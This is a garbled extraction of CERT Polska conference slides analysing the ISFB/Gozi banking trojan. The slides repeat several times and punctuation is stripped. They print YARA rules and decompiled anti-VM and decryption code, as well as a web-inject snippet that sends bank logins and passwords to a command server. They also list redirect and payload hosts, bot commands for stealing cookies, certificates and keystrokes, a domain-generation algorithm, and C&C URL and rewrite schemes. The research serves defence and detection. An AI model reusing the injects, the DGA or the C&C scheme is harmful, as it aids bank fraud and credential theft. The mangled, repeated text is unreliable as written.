middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
